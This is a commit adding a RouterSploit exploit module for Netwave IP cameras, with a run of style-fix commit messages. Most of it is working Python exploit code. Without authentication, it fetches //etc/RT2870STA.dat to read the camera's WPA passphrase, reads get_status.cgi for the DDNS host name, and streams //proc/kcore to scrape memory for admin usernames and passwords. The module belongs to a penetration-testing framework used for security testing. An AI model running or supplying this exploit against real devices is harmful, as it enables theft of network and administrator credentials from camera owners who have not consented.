Netwave ip camera password disclosure (#257)

* Netwave ip camera password disclosure

Netwave ip camera password disclosure exploit

* pep8

pep8

* PEP8 corrections

PEP8 corrections

* PEP8

PEP 8 corrections

* removed subproccess

replaced wget and grep with inter_content

* removed unused imports 

removed unused imports

* Implemented changes

changes implemented as suggested

* re-checked for weird character

re-checked for weird character

* corrected indent

IndentationError: expected an indented block

* deleted ^M

deleted ^M

* dos2unix for ^M deletion

dos2unix for ^M deletion

* deleted file

deleted file

* re-uploaded netwave_ipcamera.py

re-uploaded netwave_ipcamera.py

* Update netwave_IP_camera.py

* updated check method 

updated check method

routersploit/modules/exploits/cameras/multi/netwave_IP_camera.py

+from routersploit import (
+    exploits,
+    print_error,
+    print_success,
+    print_info,
+    print_status,
+    http_request,
+    mute,
+    validators,
+)
+
+
+class Exploit(exploits.Exploit):
+    """
+    Netwave IP Camera - Password Disclosure
+    """
+    __info__ = {
+        'name': 'Netwave_IP_camera',
+        'description': 'This exploit will try to retrieve WPA password and ddns host name, '
+                       'Also it would try to read memory leak in order to find username and password',
+        'authors': [
+            'renos stoikos <rstoikos[at]gmail.com>',  # routesploit module
+            'spiritnull',  # exploit-db.com exploit
+        ],
+        'references': [
+            'https://www.exploit-db.com/exploits/41236/',
+        ],
+        'devices': [
+            'Netwave IP Camera',
+        ],
+    }
+
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)  # target address
+    port = exploits.Option(80, 'Target port', validators=validators.integer)  # default port
+
+    def run(self):
+        if self.check():
+            print_success("Target is vulnerable")
+            url1 = "{}:{}//etc/RT2870STA.dat".format(self.target, self.port)
+            url2 = "{}:{}/get_status.cgi".format(self.target, self.port)
+            url3 = "{}:{}//proc/kcore".format(self.target, self.port)
+
+            response = http_request(method="GET", url=url1)
+            if response is not None and "WPAPSK" in response.text:
+                print_success("WPA Password is in this text:")
+                print_info(response.text)
+            else:
+                print_error("Could not find WPA password")
+
+            print_info("Trying to gather more info")
+            response = http_request(method="GET", url=url2)
+            if response is not None and "ddns_host" in response.text:
+                print_success("ddns host name:")
+                print_info(response.text)
+            else:
+                print_error("could not read ddns host name")
+
+            print_status("Trying to find username and password from running memory leak")
+            print_status("This could take some time")
+            print_status("password is usually stuck next to 'admin' e.g admin123456")
+            response = http_request(method="GET", url=url3, stream=True)
+            try:
+                for chunk in response.iter_content(chunk_size=100):
+                    if "admin" in chunk:
+                        print_success(chunk)
+            except:
+                print_error("Exploit failed - could not read /proc/kcore")
+
+    @mute
+    def check(self):
+        url1 = "{}:{}//etc/RT2870STA.dat".format(self.target, self.port)
+        url2 = "{}:{}/get_status.cgi".format(self.target, self.port)
+
+        check1 = http_request(method="GET", url=url1)
+        if check1 is not None and check1.status_code == 200 and "WPAPSK" in check1.text:
+            return True
+
+        check2 = http_request(method="GET", url=url2)
+        if check2 is not None and check2.status_code == 200 and "ddns" in check2.text:
+            return True
+
+        return False